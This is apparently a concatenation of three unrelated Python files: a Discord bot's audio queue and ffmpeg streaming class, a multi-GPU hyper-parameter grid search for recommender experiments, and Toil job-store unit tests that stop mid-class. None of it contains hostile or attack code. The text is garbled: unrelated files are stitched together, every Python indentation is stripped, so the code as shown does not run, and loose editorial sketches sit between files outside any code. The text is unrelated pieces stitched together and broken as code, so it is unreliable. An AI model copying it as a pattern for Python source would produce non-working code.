audio.py
"""Audio queue management."""
import asyncio
import atexit
import collections
import copy
import discord
import enum
import json
import os
import queue
import subprocess
import threading
import time
import uuid
from typing import cast, Any, Awaitable, Callable, Deque, List, Optional
import uita.exceptions
import uita.message
import uita.utils
import uita.youtube_api
import logging
log = logging.getLogger(__name__)
class Track():
"""Container for audio resource metadata.
Args:
path: Path to audio resource for ffmpeg to load.
user: User that requested track.
title: Title of track.
duration: Track duration in seconds.
live: Determines if the track is a remote livestream.
local: Determines if the track is a local file or not.
url: The public URL of the track if it exists, ``None`` otherwise.
Attributes:
id (str): Unique 32 character long ID.
path (str): Path to audio resource for ffmpeg to load.
user (uita.types.DiscordUser): User that requested track.
title (str): Title of track.
duration (int): Track duration in seconds.
live (bool): Determines if the track is a remote livestream.
local (bool): Determines if the track is a local file or not.
url (typing.Optional[str]): The public URL of the track if it exists, ``None`` otherwise.
offset (float): Offset in seconds to start track from.
"""
def __init__(
self,
path: str,
user: "uita.types.DiscordUser",
title: str,
duration: float,
live: bool,
local: bool,
url: Optional[str] = None
):
self.id = uuid.uuid4().hex
self.path = path
self.user = user
self.title = title
self.duration = float(duration)
self.live = live
self.local = local
self.url = url
self.offset: float = 0.0
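# Illustrative example (comment only, an editorial addition): a locally cached upload queued by a
# user would look roughly like
#   Track("/path/to/cache/abc123.mp3", user, "Artist - Title", 213.0, live=False, local=True)
# where user is a uita.types.DiscordUser supplied by the surrounding application.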
# NOTE: These values must be synced with the enum used in utils/Message.js:PlayStatusSendMessage
class Status(enum.IntEnum):
"""Play status for audio."""
PLAYING = 1
PAUSED = 2
class Queue():
"""Queues audio resources to be played by a looping task.
Args:
maxlen: Maximum queue size. Default is ``None``, which is unlimited.
        on_queue_change: Callback that is triggered every time the state of the playback queue
            changes. Function accepts a list of :class:`~uita.audio.Track` as its only argument.
        on_status_change: Callback that is triggered every time the playback status changes.
            Function accepts a :class:`~uita.audio.Status` as its only argument.
loop: Event loop for audio tasks to run in.
Attributes:
loop (asyncio.AbstractEventLoop): Event loop for audio tasks to run in.
status (uita.audio.Status): Current playback status (playing, paused, etc).
"""
QueueCallbackType = Callable[
[List[Track], Optional["uita.types.DiscordUser"]], Awaitable[None]
]
StatusCallbackType = Callable[[Status], None]
def __init__(
self,
maxlen: Optional[int] = None,
on_queue_change: Optional[QueueCallbackType] = None,
on_status_change: Optional[StatusCallbackType] = None,
loop: Optional[asyncio.AbstractEventLoop] = None
) -> None:
# async lambdas don't exist
async def dummy_queue_change(q: Any, u: Any) -> None: pass
self._on_queue_change = on_queue_change or dummy_queue_change
        def dummy_status_change(s: Any) -> None: pass
        self._on_status_change = on_status_change or dummy_status_change
self.loop = loop or asyncio.get_event_loop()
self.status = Status.PAUSED
self._now_playing: Optional[Track] = None
self._queue: Deque[Track] = collections.deque()
self._queue_lock = asyncio.Lock(loop=self.loop)
self._queue_update_flag = asyncio.Event(loop=self.loop)
self._queue_maxlen = maxlen
self._play_task: Optional[asyncio.Task[Any]] = None
self._play_start_time: Optional[float] = None
self._stream: Optional[FfmpegStream] = None
self._voice: Optional[discord.VoiceClient] = None
def queue(self) -> List[Track]:
"""Retrieves a list of currently queued audio resources.
Returns:
Ordered list of audio resources queued for playback.
"""
if self._now_playing is not None:
            # To maintain timer precision we want to avoid modifying the current track's offset
            # outside of pause/resumes
now_playing = copy.copy(self._now_playing)
if self._play_start_time is not None:
now_playing.offset += max(
time.perf_counter() - self._play_start_time,
0.0
)
return [now_playing] + list(self._queue)
return list(self._queue)
def queue_full(self) -> bool:
"""Tests if the queue is at capacity.
Returns:
True if the queue is full.
"""
return self._queue_maxlen is not None and len(self.queue()) >= self._queue_maxlen
async def play(self, voice: discord.VoiceClient) -> None:
"""Starts a new playlist task that awaits and plays new queue inputs.
First stops current playlist task if it exists.
Args:
voice: Voice connection to spawn audio players for.
"""
# Cancels currently running play task
await self.stop()
self._play_task = self.loop.create_task(self._play_loop(voice))
async def stop(self) -> None:
"""Stops and currently playing audio and cancels the running play task."""
if self._play_task is not None:
# If we stop during a song, add it to the front of the queue to be resumed later
if self._now_playing is not None:
if self._play_start_time is not None:
# Add the time spent playing this track to the starting offset, so it resumes
# where it left off
self._now_playing.offset += max(
time.perf_counter() - self._play_start_time,
0.0
)
self._play_start_time = None
self._queue.appendleft(self._now_playing)
self._now_playing = None
self._play_task.cancel()
await self._play_task
self._end_stream()
async def enqueue_file(self, path: str, user: "uita.types.DiscordUser") -> None:
"""Queues a file to be played by the running playlist task.
Args:
path: Path for audio resource to be played.
user: User that requested track.
Raises:
uita.exceptions.ClientError: If called with an unusable audio path.
"""
# Some quick sanitization to make sure bad input won't escape the cache directory
# However user input should never reach this function
filename = os.path.join(uita.utils.cache_dir(), os.path.basename(path))
if not os.path.isfile(filename):
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("Invalid audio format")
)
completed_probe_process = await self.loop.run_in_executor(
None,
lambda: subprocess.run([
"ffprobe",
filename,
"-of", "json",
"-show_format",
"-show_streams",
"-select_streams", "a",
"-show_error",
"-loglevel", "quiet"
], stdout=subprocess.PIPE)
)
probe = json.loads(completed_probe_process.stdout.decode("utf-8"))
if "format" not in probe:
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("Invalid audio format")
)
if "streams" not in probe or len(probe["streams"]) == 0:
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("No audio track found")
)
title = "untagged file upload"
if "tags" in probe["format"]:
            # ffprobe sometimes returns tag keys in all caps, sometimes not
tags = {k.lower(): v for k, v in probe["format"]["tags"].items()}
title = "{} - {}".format(
tags.get("artist", "Unknown artist"),
tags.get("title", "Unknown title")
)
log.info(f"[{user.name}:{user.id}] Enqueue [Local]{title}, {probe['format']['duration']}s")
# This check cannot have any awaits between it and the following queue.append()s
if self.queue_full():
raise uita.exceptions.ClientError(uita.message.ErrorQueueFullMessage())
self._queue.append(Track(
filename,
user,
title,
float(probe["format"]["duration"]),
live=False,
local=True
))
await self._notify_queue_change(user)
async def enqueue_url(self, url: str, user: "uita.types.DiscordUser") -> None:
"""Queues a URL to be played by the running playlist task.
Args:
url: URL for audio resource to be played.
user: User that requested track.
Raises:
uita.exceptions.ClientError: If called with an unusable audio path.
"""
info = await uita.youtube_api.scrape(url, loop=self.loop)
# This check cannot have any awaits between it and the following queue.append()s
if self.queue_full():
raise uita.exceptions.ClientError(uita.message.ErrorQueueFullMessage())
if info["extractor"] == "Youtube":
log.info(f"[{user.name}:{user.id}] Enqueue [YouTube]{info['title']}({info['id']}) "
f"{info['acodec']}@{info['abr']}abr, {info['duration']}s")
self._queue.append(Track(
info["url"],
user,
info["title"],
float(info["duration"]),
info["is_live"] or False, # is_live is either True or None?? Thanks ytdl
local=False,
url=f"https://youtube.com/watch?v={info['id']}"
))
await self._notify_queue_change(user)
elif info["extractor"] == "YoutubePlaylist":
if info["_type"] != "playlist":
raise uita.exceptions.ServerError("Unknown playlist type")
for entry in info["entries"]:
await self.enqueue_url(f"https://youtube.com/watch?v={entry['id']}", user)
else:
raise uita.exceptions.ClientError(uita.message.ErrorUrlInvalidMessage())
async def move(self, track_id: str, position: int) -> None:
"""Moves a track to a new position in the playback queue.
Args:
track_id: Track ID of audio resource to be moved.
position: Index position for the track to be moved to.
"""
async with self._queue_lock:
if position >= len(self.queue()) or position < 0:
log.debug("Requested queue index out of bounds")
return
# Check if re-ordering the queue will change the currently playing song
if self._now_playing is not None and self._voice is not None:
# No need to swap with self while playing, would restart the track
if self._now_playing.id == track_id and position == 0:
return
if self._now_playing.id == track_id or position == 0:
self._now_playing.offset = 0
self._queue.appendleft(self._now_playing)
self._now_playing = None
self._voice.stop()
# Since now_playing will not be added to the queue, offset the index to compensate
else:
position -= 1
for index, track in enumerate(self._queue):
if track.id == track_id:
del self._queue[index]
self._queue.insert(position, track)
await self._notify_queue_change()
return
async def remove(self, track_id: str) -> None:
"""Removes a track from the playback queue.
Args:
track_id: Track ID of audio resource to be removed.
"""
async with self._queue_lock:
if self._now_playing is not None and self._now_playing.id == track_id:
if self._voice is not None:
self._voice.stop()
return
for track in self._queue:
if track.id == track_id:
self._queue.remove(track)
await self._notify_queue_change()
return
async def _after_song(self) -> None:
async with self._queue_lock:
self._now_playing = None
self._change_status(Status.PAUSED)
await self._notify_queue_change()
self._end_stream()
def _change_status(self, status: Status) -> None:
self.status = status
self._on_status_change(self.status)
async def _play_loop(self, voice: discord.VoiceClient) -> None:
try:
while voice.is_connected():
self._queue_update_flag.clear()
async with self._queue_lock:
if self._voice is None and len(self._queue) > 0:
self._now_playing = self._queue.popleft()
log.info(f"[{self._now_playing.user.name}:{self._now_playing.user.id}] "
f"Now playing {self._now_playing.title}")
# Launch ffmpeg process
self._stream = FfmpegStream(
self._now_playing,
discord.opus.Encoder()
)
self._voice = voice
# Waits until ffmpeg has buffered audio before playing
await self._stream.wait_ready(loop=self.loop)
# Wait an extra second for livestreams so player clock runs behind input
if self._now_playing.live is True:
await asyncio.sleep(1, loop=self.loop)
# Sync play start time to player start
self._play_start_time = time.perf_counter()
self._voice.play(
# About the same as a max volume YouTube video, I think
discord.PCMVolumeTransformer(self._stream, volume=0.3),
after=lambda err: asyncio.run_coroutine_threadsafe(
self._after_song(),
loop=self.loop
)
)
self._change_status(Status.PLAYING)
await self._queue_update_flag.wait()
except asyncio.CancelledError:
pass
except Exception as e:
log.error(f"Unhandled exception: {e}")
async def _notify_queue_change(self, user: Optional["uita.types.DiscordUser"] = None) -> None:
self._queue_update_flag.set()
await self._on_queue_change(self.queue(), user)
def _end_stream(self) -> None:
if self._stream is not None:
self._stream.stop()
self._stream = None
if self._voice is not None:
self._voice.stop()
self._voice = None
class FfmpegStream(discord.AudioSource):
"""Provides a data stream interface from an ffmpeg process for a ``discord.StreamPlayer``
Compared to the ffmpeg stream player provided by ``discord.FFmpegPCMAudio``,
this implementation will attempt to pre-fetch and cache (buffer) a sizable amount of audio
data in a concurrently running thread to minimize any hiccups while fetching audio data for
    the consumer thread. This noticeably cuts down on stuttering during playback, especially for
live streams.
Args:
track: Track to be played.
encoder: Opus encoder is needed to configure sampling rate for FFmpeg.
"""
def __init__(self, track: Track, encoder: discord.opus.Encoder) -> None:
self._track = track
self._encoder = encoder
process_options = [
"ffmpeg"
]
# The argument order is very important
if not self._track.local:
process_options += [
"-reconnect", "1",
"-reconnect_streamed", "1",
"-reconnect_delay_max", "10"
]
process_options += [
"-ss", str(track.offset if not track.live else 0.0),
"-i", track.path,
"-f", "s16le",
"-ac", str(self._encoder.CHANNELS),
"-ar", str(self._encoder.SAMPLING_RATE),
"-acodec", "pcm_s16le",
"-vn",
"-loglevel", "quiet",
"pipe:1"
]
self._process = subprocess.Popen(process_options, stdout=subprocess.PIPE)
# Ensure ffmpeg processes are cleaned up at exit, since Python handles this horribly
atexit.register(self.stop)
# Expecting a frame size of 3840 currently, queue should max out at 3.5MB~ of memory
self._buffer: queue.Queue[bytes] = queue.Queue(maxsize=1000)
# Run audio production and consumption in separate threads, buffering as much as possible
# This cuts down on audio dropping out during playback (especially for livestreams)
self._buffer_thread = threading.Thread(target=self._buffer_audio_packets)
# Causes thread to force exit on shutdown without cleaning up resources
# Python is really pretty bad for concurrency, maybe they intend for you to use events to
# trigger resource cleanup except this totally defeats the purpose of being able to use
# blocking calls in threads which is exactly how most of these threadable data structures
# are meant to be used!! It's very poorly designed!!!
        self._buffer_thread.daemon = True
        # Set once the queue has buffered audio data available. Created before the thread starts,
        # since the buffer thread is what sets it.
        self._is_ready = threading.Event()
        self._buffer_thread.start()
def read(self) -> bytes:
"""Returns an array of raw audio data.
Returns:
Array of raw audio data. Size of array is equal to (or less than if EOF has been
reached) the ``FRAME_SIZE`` of the opus Encoder parameter passed into the object
constructor.
"""
try:
return self._buffer.get(timeout=10)
except queue.Empty:
log.warning("Audio process queue is not being produced")
self.stop()
# Empty read indicates completion
return b""
def is_opus(self) -> bool:
"""Produces raw PCM audio data."""
return False
def cleanup(self) -> None:
"""Cleanup is handled outside the discord.py API."""
pass
def stop(self) -> None:
"""Stops any currently running processes."""
try:
# We don't need to kill the thread here since it auto terminates after 10 seconds
# without buffer consumption
self._process.kill()
except Exception:
# subprocess.kill() can throw if the process has already ended...
# But I forget what type of exception it is and it's seemingly undocumented
pass
finally:
self._is_ready.set()
atexit.unregister(self.stop)
async def wait_ready(self, loop: Optional[asyncio.AbstractEventLoop] = None) -> None:
"""Waits until the first packet of buffered audio data is available to be read.
Args:
loop: Event loop to launch threaded blocking wait task from.
"""
async_loop = loop or asyncio.get_event_loop()
await async_loop.run_in_executor(None, lambda: self._is_ready.wait())
def _buffer_audio_packets(self) -> None:
need_set_ready = True
# Read from process stdout until an empty byte string is returned
def read() -> bytes:
return cast(bytes, self._process.stdout.read(self._encoder.FRAME_SIZE))
for data in iter(read, b""):
try:
# If the buffer fills and times out it means the queue is no longer being
# consumed, this likely means we're running in a zombie thread and should
# terminate. Ideally Python would let you send cancellation exceptions
# to child threads, much like how asyncio works, but hey who cares about
# consistency? Just let the timeout clean up our old resources instead...
# However! Since we use daemon threads, this method would just leave dangling
# ffmpeg processes on exit, and so we must register every spawned process to be
                # cleaned up on exit. Python is really pretty terrible for concurrency. Cheers.
if len(data) != self._encoder.FRAME_SIZE:
break
self._buffer.put(data, timeout=10)
if need_set_ready is True:
self._is_ready.set()
need_set_ready = False
except queue.Full:
self.stop()
return
try:
# self.read returning an empty byte string indicates EOF
self._buffer.put(b"", timeout=5)
except queue.Full:
pass
finally:
self.stop()
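A minimal usage sketch for Queue (an editorial illustration, not part of audio.py): it assumes this module is importable as uita.audio and that the discord.VoiceClient and uita.types.DiscordUser objects come from the surrounding bot, so neither is constructed here.

import uita.audio

async def on_queue_change(tracks, user):
    # Receives the full, ordered track list (now playing first) after every change.
    print(f"queue changed: {len(tracks)} track(s)")

def on_status_change(status):
    # Receives a uita.audio.Status value (PLAYING or PAUSED).
    print(f"status: {status.name}")

async def start_playback(voice_client, user, url):
    player = uita.audio.Queue(
        maxlen=50,
        on_queue_change=on_queue_change,
        on_status_change=on_status_change,
    )
    await player.enqueue_url(url, user)  # scrape metadata and append a Track
    await player.play(voice_client)      # spawn the looping playback task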
grid_search.py
import os
import gc
import copy
import time
import json
import datetime
import traceback
from tqdm import tqdm
import multiprocessing
from main import main
from utils import get_common_path
from data_path_constants import get_index_path, get_log_file_path
# NOTE: Specify all possible combinations of hyper-parameters you want to search on.
# NOTE: A list of values for a hyper-parameter means that you want to train all possible combinations of them
hyper_params = {
'dataset': [
'magazine',
# 'ml-100k',
],
'task': [
'explicit',
'implicit',
'sequential',
],
'sampling': [
'complete_data',
'user_rns',
'interaction_rns',
'freq_user_rns',
'temporal',
'tail_user_remove',
'svp_bias_only',
'svp_MF_dot',
'pagerank',
'random_walk',
'forest_fire',
],
'sampling_svp': [
'forgetting_events',
'forgetting_events_propensity',
'forgetting_events_user',
'forgetting_events_user_propensity',
],
'sampling_percent': [ 20, 40, 60, 80, 90, 99 ],
'latent_size': [ 8, 16, 32, 50 ], # Latent size in all algos
'lr': 0.006, # LR for ADAM # 0.01 for ml-100k ; 0.003 for ml-25m
'dropout': [ 0.3 ], # 0.3/4 works good for 0-core, 0.6/8 for 5-core
'model_type': [
'pop_rec',
'bias_only',
'MF_dot',
'NeuMF',
'MVAE',
'SVAE',
'SASRec',
],
'num_heads': 1, ## SASRec
'num_blocks': 2, ## SASRec
'num_next': [ 2 ], ## SVAE
'num_train_negs': 1,
'num_test_negs': 100,
#### Below hyper-params will be re-set from `data_hyperparams`
#### But adding just because we need them to compute common path
#### while counting the number of unique tasks
'weight_decay': float(1e-6),
}
# NOTE: Entering multiple of the same GPU-ID will launch multiple runs on the SAME GPU
# NOTE: Entering -1 or an invalid GPU-ID will run a corresponding run on the CPU
gpu_ids = [ 0, 0, 1, 1 ]
################## CONFIGURATION INPUT ENDS ###################
# STEP-1: Count processes
def get_all_jobs(task):
ret, single_proc = [], True
for key in task:
if type(task[key]) != list: continue
single_proc = False
for val in task[key]:
send = copy.deepcopy(task) ; send[key] = val
ret += get_all_jobs(send)
break # All sub-jobs are already counted
return ret if not single_proc else [ task ]
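# For example (illustration only): get_all_jobs({'dataset': ['a', 'b'], 'lr': 0.01,
# 'latent_size': [8, 16]}) expands the two list-valued keys into their cartesian product
# and returns 4 dicts, each keeping 'lr' fixed at 0.01.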
duplicate_tasks = get_all_jobs(hyper_params)
print("Total processes before unique:", len(duplicate_tasks))
def enough_users_items(task):
data_stats_file = get_index_path(task) + "data_stats.json"
with open(data_stats_file) as f: stats = json.load(f)
return stats['num_users'] >= 50 and stats['num_items'] >= 50 and stats['num_train_interactions'] >= 100
temp = set()
covered_tasks, all_tasks = set(), []
for task in tqdm(duplicate_tasks):
log_file = get_common_path(task)
if log_file is None: continue
if log_file in covered_tasks: continue
if not enough_users_items(task): continue
temp.add(log_file)
##### TEMP: Checking if job has already been done
if os.path.exists(get_log_file_path(task)):
f = open(get_log_file_path(task), 'r')
lines = f.readlines() ; f.close()
exists = sum(map(lambda x: int('TEST' in x.strip()), lines))
if exists != 0: continue
all_tasks.append(task)
covered_tasks.add(log_file)
print("Total processes after unique:", len(temp))
print("Total processes after removing already finished jobs:", len(all_tasks))
print(set(list(map(lambda x: x['model_type'], all_tasks))))
# exit()
# STEP-2: Assign individual GPU processes
gpu_jobs = [ [] for _ in range(len(gpu_ids)) ]
for i, task in enumerate(all_tasks): gpu_jobs[i % len(gpu_ids)].append(task)
# STEP-3: Spawn jobs in parallel
def file_write(log_file, s):
f = open(log_file, 'a')
f.write(s+'\n')
f.close()
def run_tasks(hyper_params, tasks, gpu_id):
start_time = time.time()
for num, task in enumerate(tasks):
percent_done = max(0.00001, float(num) / float(len(tasks)))
time_elapsed = time.time() - start_time
file_write(
"experiments/grid_search_log.txt",
str(task) + "\nGPU_ID = " + str(gpu_id) + "; dataset = " + task['dataset'] + "; [{} / {}] ".format(num, len(tasks)) +
str(round(100.0 * percent_done, 2)) + "% done; " +
"ETA = " + str(datetime.timedelta(seconds=int((time_elapsed / percent_done) - time_elapsed)))
)
try: main(task, gpu_id = gpu_id)
except Exception as e:
file_write(
"experiments/grid_search_log.txt", "GPU_ID = " + str(gpu_id) + \
"; ERROR [" + str(num) + "/" + str(len(tasks)) + "]\nJOB: " + str(task) + "\n" + str(traceback.format_exc())
)
gc.collect()
for gpu in range(len(gpu_ids)):
p = multiprocessing.Process(target=run_tasks, args=(hyper_params, gpu_jobs[gpu], gpu_ids[gpu], ))
p.start()
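A standalone sketch (not part of grid_search.py) of the same round-robin GPU assignment and process spawning, with an optional join so the launcher blocks until every worker exits; worker() here is a stand-in for run_tasks and the task dicts are placeholders.

import multiprocessing

def worker(tasks, gpu_id):
    # Stand-in for run_tasks(hyper_params, tasks, gpu_id)
    print("GPU", gpu_id, "received", len(tasks), "task(s)")

if __name__ == "__main__":
    gpu_ids = [0, 0, 1, 1]
    all_tasks = [{"job": i} for i in range(10)]   # placeholders for hyper-parameter dicts
    gpu_jobs = [[] for _ in range(len(gpu_ids))]
    for i, task in enumerate(all_tasks):
        gpu_jobs[i % len(gpu_ids)].append(task)   # tasks 0,4,8 -> worker 0; 1,5,9 -> worker 1; ...
    procs = [
        multiprocessing.Process(target=worker, args=(gpu_jobs[g], gpu_ids[g]))
        for g in range(len(gpu_ids))
    ]
    for p in procs:
        p.start()
    for p in procs:
        p.join()   # optional: wait for all workers to finish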
jobStoreTest.py
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import str
from past.utils import old_div
from builtins import object
import socketserver
import pytest
import hashlib
import logging
import threading
import os
import sys
import shutil
import tempfile
import time
import uuid
from stubserver import FTPStubServer
from abc import abstractmethod, ABCMeta
from itertools import chain, islice
from threading import Thread
from six.moves.queue import Queue
from six.moves import SimpleHTTPServer, StringIO
from six import iteritems
import six.moves.urllib.parse as urlparse
from six.moves.urllib.request import urlopen, Request
from toil.lib.memoize import memoize
from toil.lib.exceptions import panic
# noinspection PyPackageRequirements
# (installed by `make prepare`)
from toil.common import Config, Toil
from toil.fileStores import FileID
from toil.job import Job, JobDescription, TemporaryID
from toil.jobStores.abstractJobStore import (NoSuchJobException,
NoSuchFileException)
from toil.jobStores.fileJobStore import FileJobStore
from toil.statsAndLogging import StatsAndLogging
from toil.test import (ToilTest,
needs_aws_s3,
needs_encryption,
make_tests,
needs_google,
travis_test,
slow)
from future.utils import with_metaclass
# Need googleRetry decorator even if google is not available, so make one up.
# Unconventional use of decorator to determine if google is enabled by seeing if
# it returns the parameter passed in.
if needs_google(needs_google) is needs_google:
from toil.jobStores.googleJobStore import googleRetry
else:
def googleRetry(x):
return x
logger = logging.getLogger(__name__)
def tearDownModule():
AbstractJobStoreTest.Test.cleanUpExternalStores()
class AbstractJobStoreTest(object):
"""
Hide abstract base class from unittest's test case loader
http://stackoverflow.com/questions/1323455/python-unit-test-with-base-and-sub-class#answer-25695512
"""
class Test(with_metaclass(ABCMeta, ToilTest)):
@classmethod
def setUpClass(cls):
super(AbstractJobStoreTest.Test, cls).setUpClass()
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('boto').setLevel(logging.CRITICAL)
        # The use of @memoize ensures that we only have one instance per class even when the
        # generative import/export tests attempt to instantiate more. This in turn enables us to
        # share the external stores (buckets, blob store containers, local directory, etc.) used
        # for testing import/export. While the constructor arguments are included in the
        # memoization key, I have only ever seen one case: ('test', ). The worst that can happen
        # if other values are also used is that there will be more external stores and less
        # sharing of them. They will still all be cleaned up.
@classmethod
@memoize
def __new__(cls, *args):
return super(AbstractJobStoreTest.Test, cls).__new__(cls)
def _createConfig(self):
return Config()
@abstractmethod
def _createJobStore(self):
"""
:rtype: AbstractJobStore
"""
raise NotImplementedError()
def setUp(self):
super(AbstractJobStoreTest.Test, self).setUp()
self.namePrefix = 'jobstore-test-' + str(uuid.uuid4())
self.config = self._createConfig()
            # Jobstores to be used in testing.
            # jobstore_initialized is created with a particular configuration, as created by
            # self._createConfig(). jobstore_resumed_noconfig is created with the resume() method.
            # resume() will look for a previously instantiated jobstore and initialize this jobstore
            # with the config it finds. In this case, jobstore_resumed_noconfig will be initialized
            # with the config from jobstore_initialized.
self.jobstore_initialized = self._createJobStore()
self.jobstore_initialized.initialize(self.config)
self.jobstore_resumed_noconfig = self._createJobStore()
self.jobstore_resumed_noconfig.resume()
# Requirements for jobs to be created.
self.arbitraryRequirements = {'memory': 1, 'disk': 2, 'cores': 1, 'preemptable': False}
# Function to make an arbitrary new job
self.arbitraryJob = lambda: JobDescription(command='command',
jobName='arbitrary',
requirements=self.arbitraryRequirements)
self.parentJobReqs = dict(memory=12, cores=34, disk=35, preemptable=True)
self.childJobReqs1 = dict(memory=23, cores=45, disk=46, preemptable=True)
self.childJobReqs2 = dict(memory=34, cores=56, disk=57, preemptable=False)
def tearDown(self):
self.jobstore_initialized.destroy()
self.jobstore_resumed_noconfig.destroy()
super(AbstractJobStoreTest.Test, self).tearDown()
@travis_test
def testInitialState(self):
"""Ensure proper handling of nonexistant files."""
self.assertFalse(self.jobstore_initialized.exists('nonexistantFile'))
self.assertRaises(NoSuchJobException, self.jobstore_initialized.load, 'nonexistantFile')
@travis_test
def testJobCreation(self):
"""
Test creation of a job.
Does the job exist in the jobstore it is supposed to be in?
Are its attributes what is expected?
"""
jobstore = self.jobstore_initialized
# Create a job and verify its existence/properties
job = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
self.assertTrue(isinstance(job.jobStoreID, TemporaryID))
jobstore.assignID(job)
self.assertFalse(isinstance(job.jobStoreID, TemporaryID))
created = jobstore.create(job)
self.assertEqual(created, job)
self.assertTrue(jobstore.exists(job.jobStoreID))
self.assertEqual(job.command, 'parent1')
self.assertEqual(job.memory, self.parentJobReqs['memory'])
self.assertEqual(job.cores, self.parentJobReqs['cores'])
self.assertEqual(job.disk, self.parentJobReqs['disk'])
self.assertEqual(job.preemptable, self.parentJobReqs['preemptable'])
self.assertEqual(job.jobName, 'test1')
self.assertEqual(job.unitName, 'onParent')
@travis_test
def testConfigEquality(self):
"""
Ensure that the command line configurations are successfully loaded and stored.
            In setUp(), self.jobstore_initialized is created and initialized. In this test, after creating
            newJobStore, .resume() will look for a previously instantiated job store and load its config
            options. This is expected to be equal but not the same object.
"""
newJobStore = self._createJobStore()
newJobStore.resume()
self.assertEqual(newJobStore.config, self.config)
self.assertIsNot(newJobStore.config, self.config)
@travis_test
def testJobLoadEquality(self):
"""Tests that a job created via one JobStore instance can be loaded from another."""
# Create a job on the first jobstore.
jobDesc1 = JobDescription(command='jobstore1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1')
self.jobstore_initialized.assignID(jobDesc1)
self.jobstore_initialized.create(jobDesc1)
# Load it from the second jobstore
jobDesc2 = self.jobstore_resumed_noconfig.load(jobDesc1.jobStoreID)
self.assertEqual(jobDesc1.command, jobDesc2.command)
@travis_test
def testChildLoadingEquality(self):
"""Test that loading a child job operates as expected."""
job = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
childJob = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.assignID(childJob)
self.jobstore_initialized.create(job)
self.jobstore_initialized.create(childJob)
job.addChild(childJob.jobStoreID)
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(list(job.allSuccessors())[0]).command, childJob.command)
@travis_test
def testPersistantFilesToDelete(self):
"""
Make sure that updating a job carries over filesToDelete.
            The following demonstrates the job update pattern, where files to be deleted are referenced in
            the "filesToDelete" array, which is persisted to disk first. If things go wrong during the update,
            this list of files to delete is used to remove the unneeded files.
"""
# Create a job.
job = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1')
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
job.filesToDelete = ['1', '2']
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(job.jobStoreID).filesToDelete, ['1', '2'])
@travis_test
def testUpdateBehavior(self):
"""Tests the proper behavior during updating jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
job1 = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
childJob1 = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
childJob2 = JobDescription(command='child2',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2')
jobstore1.assignID(job1)
jobstore1.create(job1)
job2 = jobstore2.load(job1.jobStoreID)
# Create child jobs.
jobstore2.assignID(childJob1)
jobstore2.create(childJob1)
jobstore2.assignID(childJob2)
jobstore2.create(childJob2)
# Add them to job2.
job2.addChild(childJob1.jobStoreID)
job2.addChild(childJob2.jobStoreID)
jobstore2.update(job2)
# Check equivalence between jobstore1 and jobstore2.
# While job1 and job2 share a jobStoreID, job1 has not been "refreshed" to show the newly added child jobs.
self.assertNotEqual([sorted(x) for x in job2.stack], [sorted(x) for x in job1.stack])
# Reload parent job on jobstore, "refreshing" the job.
job1 = jobstore1.load(job1.jobStoreID)
self.assertEqual([sorted(x) for x in job2.stack], [sorted(x) for x in job1.stack])
# Jobs still shouldn't *actually* be equal, even if their contents are the same.
self.assertNotEqual(job2, job1)
# Load children on jobstore and check against equivalence
self.assertNotEqual(jobstore1.load(childJob1.jobStoreID), childJob1)
self.assertNotEqual(jobstore1.load(childJob2.jobStoreID), childJob2)
@travis_test
def testJobDeletions(self):
"""Tests the consequences of deleting jobs."""
# A local jobstore object for testing.
jobstore = self.jobstore_initialized
job = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJob')
# Create job
jobstore.assignID(job)
jobstore.create(job)
# Create child Jobs
child1 = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
child2 = JobDescription(command='job1',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2')
# Add children to parent.
jobstore.assignID(child1)
jobstore.create(child1)
jobstore.assignID(child2)
jobstore.create(child2)
job.addChild(child1.jobStoreID)
job.addChild(child2.jobStoreID)
jobstore.update(job)
# Get it ready to run children
job.command = None
jobstore.update(job)
# Go get the children
childJobs = [jobstore.load(childID) for childID in job.nextSuccessors()]
            # Test job iterator - the results of the iterator are affected by eventual
# consistency. We cannot guarantee all jobs will appear but we can assert that all
# jobs that show up are a subset of all existing jobs. If we had deleted jobs before
# this we would have to worry about ghost jobs appearing and this assertion would not
# be valid
self.assertTrue(set((j.jobStoreID for j in (childJobs + [job]))) >= set((j.jobStoreID for j in jobstore.jobs())))
# Test job deletions
# First delete parent, this should have no effect on the children
self.assertTrue(jobstore.exists(job.jobStoreID))
jobstore.delete(job.jobStoreID)
self.assertFalse(jobstore.exists(job.jobStoreID))
# Check the deletion of children
for childJob in childJobs:
self.assertTrue(jobstore.exists(childJob.jobStoreID))
jobstore.delete(childJob.jobStoreID)
self.assertFalse(jobstore.exists(childJob.jobStoreID))
self.assertRaises(NoSuchJobException, jobstore.load, childJob.jobStoreID)
try:
with jobstore.readSharedFileStream('missing') as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
